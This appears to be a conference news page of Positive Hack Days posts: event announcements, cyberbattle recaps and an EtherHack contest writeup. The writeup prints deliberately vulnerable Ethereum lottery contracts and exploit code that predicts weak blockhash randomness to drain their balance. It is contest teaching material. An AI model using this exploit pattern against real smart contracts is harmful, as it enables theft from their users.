News
Become a speaker at PHDays 9!
The Call for Papers is now open for the Positive Hack Days forum on practical information security. Please send your application by May 31. Both the esteemed experts and young specialists are welcome. An international program committee consisting of independent researchers and leading IS and IT experts will name the best reports. Under the banner of "Breaking the constant" we will pay close attention to the relationship between society and technology. Presentations will target a more diverse audience than just information security experts, also addressing the IS impact on e-government, finance, cyberinsurance, blockchain, energy in the digital age, cloud computing, telecoms, relationship between business and technology, globalization, biohacking, and the future of intellect. We also welcome practical findings and research outcomes in different areas of cybersecurity: Security of embedded systems and the IoT for homes and businesses Blockchain flaws and vulnerabilities Telecom security Security of smart homes and video surveillance (CCTV) Security of financial technologies and tools Security of web and business applications Reverse engineering Applied cryptography Machine learning Malware and exploit development Targeted attacks and hardware backdoors Secure development and automation of protection tools Participation formats: Report (50 minutes), Fast Track (15 minutes), and Hands-on Lab (up to 4 hours). To participate in the conference, please fill out the application form at phdays2019.exordo.com. For more information, check the Call for Paper page
PHDays 9 tickets available now
The early bird catches the worm, as well as a nice discount on tickets to PHDays. Act by January 10, 2019, and get a ticket for both days for just RUB 7,337! On January 11, prices will increase to RUB 9,600 for two days and RUB 7,337 for one day. And starting March 1, you'll have to pay RUB 14,400 for two days and RUB 9,600 for one. Quantities are limited! So don't delay and get your PHDays 9 ticket at a special low price! There are also ways to snag a PHDays ticket for free. Dazzle us with security research you're willing to present, win in one of our special hacking contests, or join one of the teams in The Standoff. More details to come!
Breaking the constants at PHDays 9
Exciting news: the slogan and topics are now out for next year's Positive Hack Days international forum on practical security. Under the banner of "Breaking the constant" speakers and contests at PHDays 9 will situate information security in the wider context of the relationship between society and technology. The event will bring hackers, security experts, and IT specialists together with those from fields not traditionally associated with digital security, including medicine, policymaking, and neurotechnology. What are the constants? Constants rule the world. Any event, from birth of a snowflake to exchange rate fluctuations, can be described with the help of unchanging numbers such as pi, the gravitational constant, and the golden ratio. We now live in a digital world where virtually all human activities depend on information technologies. Our digital world is subject to its own constants. Cloud computing, big data, artificial intelligence, machine learning, blockchain, virtual reality, and the Internet of Things all seem unshakable, if not inevitable. But if constants rule the world, who rules the constants? Can we take them for granted? What if they are broken by something—or someone? At PHDays 9, we are going to take a peek at the butterfly effect in today's age. By rethinking widespread assumptions, we can start imagining what might happen if these constants crumble. Boris Simis, Deputy CEO at Positive Technologies, said: "Government, business, and individuals live in a digital world. No longer is technology something that concerns 'computer people' only. The purpose of PHDays 9 is to help governments, businesses, IT, and security experts take a fresh look at the digital constants through the lens of information security. Discussion will include e-government, finance and banking, cyberinsurance, blockchain, energy in the digital age, cloud computing, globalization, telecoms, the information security market, relationship between business and technology, biohacking, and the future of intellect." PHDays 9 will be distinguished by a particularly unique and wide-ranging list of topics. Keynotes, presentations, and roundtables will offer something for both security professionals and anyone interested in the impact of security on nearly every area of life. More details will become available in February. Real world, real hands-on Presentations at PHDays 9 will target a more diverse audience, with a balance between content intended for novices and technical experts. Key topics will include: Security of embedded systems and the IoT for homes and businesses Blockchain flaws and vulnerabilities Telecom security Security of smart homes and video surveillance/CCTV Security of financial technologies and tools Security of web and business applications Reverse engineering Applied cryptography Machine learning Malware and exploit development Targeted attacks and hardware backdoors Secure development and automation of protection tools Contests are at the heart of PHDays 9. Timur Yunusov, member of the PHDays organizing committee, explained: "At PHDays 9, we are making a special effort to encourage a wider range of participants to compete. Besides competitors who prepare well in advance, we also want to inspire spur-of-the-moment participation by ordinary forum visitors. This is why most contests will be in workshop format: every few hours, visitors can come up and get an explanation of the basic principles, enough to complete at least a trivial task. Learning by doing will help participants to quickly grasp the subject and apply knowledge in practice. As always though, our classic hardcore hacking contests will be back in full force." Contest workshops will vary in complexity and subject matter, including industrial and financial systems, home and industrial IoT, smart cars and devices, reverse engineering, radio and hardware, and cryptography. For many, The Standoff is the highlight of PHDays. This intense badguys-versus-goodguys cyberbattle will be the centerpiece of the contests, just as in past years. More about The Standoff will come later, so stay tuned! PHDays 9 will be held on May 21–22, 2019, in Moscow at the Crocus Expo International Exhibition Center. Tickets will go on sale in December.
PHDays moves to Crocus Expo: check out the new venue
The dates of Positive Hack Days 9 are already out: the forum will be held on May 21–22, 2019. This time the organizers have chosen one of the largest and best equipped venues in town—the Crocus Expo International Exhibition Center. Crocus Expo hosts hundreds of large-scale and high-profile events annually, including national and international exhibitions, conferences, symposiums, and sports competitions with participation from both Russian and foreign companies. The new venue is twice as large as the World Trade Center Moscow, which used to host the event before. Just to give you an idea, the smallest conference hall in the World Trade Center seats 60 people, while Crocus Expo halls start at 160. This year there will be room for everyone who wants in on the Positive Development User Group, we promise! :) PHDays 9 will occupy the entire Crocus Congress Hall (Hall 20, Pavilion 3). It's a one-of-a-kind transformer hall that allows to configure the layout as needed. That means we will be able to expand our agenda considerably.
Positive Hack Days 9 to be held May 21–22 at Crocus Expo
The dates of the ninth Positive Hack Days are now out: next year's forum will take place at an all-new venue, the Crocus Expo International Exhibition Center, on May 21–22, 2019. More visitors are coming to PHDays every year: in 2018, over 5,000 people were in attendance. Crocus Expo offers more space than the World Trade Center Moscow, which will enable hosting an even larger number of guests and speakers. Preparations have already started for the event program, The Standoff, and competition infrastructure. The agenda will include several tracks addressing security research, technology-related risks for businesses and governments, and other topics. A new point of emphasis will be the impact of information security on the lives of ordinary people. In addition, effort will be made at PHDays 9 to reach out beyond security practitioners to include developers and IT professionals. A number of talks and workshops will attempt to bridge the gap between the IT and infosec worlds. Timing of the Call for Papers has been announced: proposals from interested speakers will be accepted from January 14 to March 14, 2019. Tickets for PHDays will go on sale in December. As in past years, PHDays promises to excite with its competitions, in which participants demonstrate threats potentially facing critical infrastructure, banking and government systems, blockchain, the Internet of Things, and more. Spring is still over six months away, so in the meantime we encourage you to enjoy the highlights from PHDays 8, recordings of which you can watch online.
The Standoff at Positive Hack Days 8: attack debriefing
The Standoff was back this year at Positive Hack Days 8, where over 100 participants on 12 attacker teams, 7 defender teams, and security operations center (SOC) teams were eager to show their mastery of the digital systems of an entire mock city. The city network was monitored by three Positive Technologies products: MaxPatrol SIEM** – security information and event management (SIEM) PT Network Attack Discovery** – network traffic analysis, incident detection, and investigation PT MultiScanner** – multilevel system for identifying and blocking malicious content Functioning of these products and game events were all under the watchful gaze of the Positive Technologies Expert Security Center (PT ESC), which shared its findings with the PHDays audience. So many events took place that it would be impossible to describe them all. Here we will focus on describing the networks of Office 2 (belonging to fictional systems integrator SPUTNIK) and Office 1 (belonging to fictional insurer BeHealthy). Office 2 was interesting because it was monitored by the Rostelecom SOC, but not under the protection of any defender team, due to which attackers had free run of its systems. Besides these two offices, the city also contained an electrical plant with substation, railroad, smart homes, and banks with ATMs.
Cyberbattle at PHDays, or How to hack city infrastructure in 30 hours
For the third year running, the highlight of the hacking contests at Positive Hack Days is The Standoff, in which teams of attackers, defenders, and security operations centers (SOCs) do battle in a virtual city. Experience in 2016 and 2017 showed the appeal of this ultrarealistic format for both participants and visitors at PHDays. So there was no doubt among the organizers that The Standoff deserved to return this year. In 2018, a total of 19 teams took part in The Standoff, and for nearly 30 hours, these teams fought for control of the city. The defenders stood fast, but the attackers still managed to pull off some hacks: according to the rules, some targets were deliberately left unprotected. Meanwhile, the battle among the attacker teams for first place was rather hot indeed—the scoreboard was turned nearly upside down just half an hour before the end of play. Read on for a blow-by-blow account of what happened during these two exciting days. Day 1: Getting the lay of the digital land Events were slow in coming on the first day. Attackers took their time reconnoitering and learning about the targets. As announced previously, the city's economy was based on digital technologies. City infrastructure included an electrical plant and substation, railroad, office buildings, energy-efficient smart homes, banks with ATMs and self-service kiosks, mobile communications, the Internet, and online services.
PHDays 8: EtherHack contest writeup
At this year's PHDays, we held an all-new contest named EtherHack. Participants were on the clock as they solved tasks involving smart contract vulnerabilities. Here we present the contest tasks along with a detailed explanation of the intended solutions. Azino 777 Win the lottery and hit the jackpot! The first three tasks featured poor randomness issues that were covered in our recent research: Predicting Random Numbers in Ethereum Smart Contracts. As an easy warmup, the first task was based on a pseudorandom number generator (PRNG) that relied on the blockhash of the last block as a source of entropy for generating random numbers: pragma solidity ^0.4.16;
contract Azino777 {
function spin(uint256 bet) public payable {
require(msg.value >= 0.01 ether);
uint256 num = rand(100);
if(num == bet) {
msg.sender.transfer(this.balance);
}
}
//Generate random number between 0 & max
uint256 constant private FACTOR = 1157920892373161954235709850086879078532699846656405640394575840079131296399;
function rand(uint max) constant private returns (uint256 result){
uint256 factor = FACTOR * 100 / max;
uint256 lastBlockNumber = block.number - 1;
uint256 hashVal = uint256(block.blockhash(lastBlockNumber));
return uint256((uint256(hashVal) / factor)) % max;
}
function() public payable {}
}
Because the result of block.blockhash(block.number-1) would be the same for any transaction within the same block, a successful attack could use an exploit contract with the same rand() function to call the target contract via an internal message:
function WeakRandomAttack(address _target) public payable {
target = Azino777(_target);
}
function attack() public {
uint256 num = rand(100);
target.spin.value(0.01 ether)(num);
}
Private Ryan
We added a private seed, nobody will ever learn it!
This task is a slightly tougher twist on the previous one. A variable seed, deemed private, was used as an offset to block.number so that the blockhash would not be dependent on the previous block. After each bet, seed would be overwritten with a new "random" value. This was the case with the Slotthereum lottery.
contract
PrivateRyan {
uint private seed = 1;
function PrivateRyan() {
seed = rand(256);
}
function spin(uint256 bet) public payable {
require(msg.value >= 0.01 ether);
uint256 num = rand(100);
seed = rand(256);
if(num == bet) {
msg.sender.transfer(this.balance);
}
}
/* ... */
}
Similarly to the previous task, an attacker would just need to copy the rand() function into the exploit contract, but this time the value of the private variable seed would need to be obtained off-chain and then supplied to the exploit as an argument. To do so, one could take advantage of the web3.eth.getStorageAt() method of the web3 library:MeterH3cker contest writeup: hacking smart meters at PHDays 8
The contests at this year's Positive Hack Days included MeterH3cker, an all-new competition for hacking the smart grid. Participants had the run of two mock buildings powered by solar panels; excess power was sold back to the grid at a special rate. The job of the participants was to interfere with metering by any means necessary in order to improve their account balance. Stand
Mr. Robot entertains visitors of PHDays 8
Mr. Robot again cheered guests of Positive Hack Days. This year, people could not only play a quiz, but also upgrade their skills using hacking tools or even have an interview for a job at Positive Technologies! Over 2,000 people came to have a talk with our chatbot, and that certainly boosted its artificial ego :) Keep reading for more details. What's new? The robot's software underwent substantial changes. Alexander Melkikh shared upgrade details: "We added new interactive features to our robot: in addition to contests (Quiz and Hacking Crash Course), it now has new activities—Get a Job at Positive Technologies and Meet Your Security Soulmate. Because of that, we had to rewrite the backend. Last year, we had had raw PHP that caused us a lot of problems, that's why this time we applied Falcon, an easy-to-use Python web framework." Contests The forum visitors enjoyed the contests. The most popular again was the Quiz. The rules are similar to Who Wants to Be a Millionaire: participants are to answer multiple-choice questions of various complexity. We prepared many sets, each containing five questions that were randomly displayed on the screen. Most questions were tongue-in-cheek, but some were intricate and related to information security, for example reverse engineering. If a participant made a mistake, the robot neglected the first law of robotics for a while and punished the unlucky contestant with a water jet shower so strong that it even bystanders got under it. So, everyone could refresh a little in the midst of PHDays :) Winning the Quiz brought no awards, because the robot believes that it's not the winning that counts, it's the taking part and enjoying the process. No wonder the second popular contest was the Hacking Crash Course, because we wanted participants to have fun and try their hands in different subjects in a short time. This contest had three courses, about 15 seconds each. The first course, SQL Injection, was a fictitious e-banking website with a form to enter login and password. To bypass authorization, participants had to press the single quote key on the software keyboard and then click Enter. This year, participants could try out IDA and Radare disassemblers. The IDA course teaches a well-known function that allows viewing all strings in binary files and is summoned by a combination of Shift and F12. The Radare course explained how to quit the disassembler. The authors of the course meant to joke about complicated and obscure key combinations in Radare. The robot was friendly and had prompts for participants: if someone did not know which keys to press, the correct key on the keyboard dimly lit up in several seconds, so all participants successfully completed their training. Successful completion of the course was confirmed by a certificate with a participant's photo—a webcam above the screen made a photo at the course completion. The most complex and important part of the robot activity this year was an interview for a job at Positive Technologies. Penetration testers and incident response and application protection specialists created quizzes for applicants in various spheres. An applicant should choose one of suggested spheres and answer 5 questions from a considerable list. More than one answer could be correct for some questions. If an interview had positive results, an applicant's photo and test results were sent to the HR chat in Telegram, and a certificate was printed out. The applicant could come to the HR stand with this certificate to receive a gift and continue the interview. The contest Meet Your Security Soulmate was similar to Tinder, a popular dating application. The only difference was that participants needed to swipe quotations of information security celebrities, not photos. Part of quotations were real, and some were generated based on original utterances. If most quotations were by the same person, the robot showed the photo of this celebrity and a participant together and turned on a romantic song. Resume Statistics confirmed that people are eager to communicate with artificial intelligence. More than two thousand people took part in the robot's contests during the two days of the forum. About 1,800 participants tried the Quiz (in 2017 there were 1,400 participants), and 820 got a water shower for wrong answers (1,300 people were unlucky in 2017). The Hacking Crash Course was taken by 160 people (360 in 2017). Interview for a job at Positive Technologies was taken by 226 people, and 105 participants found their security soulmate.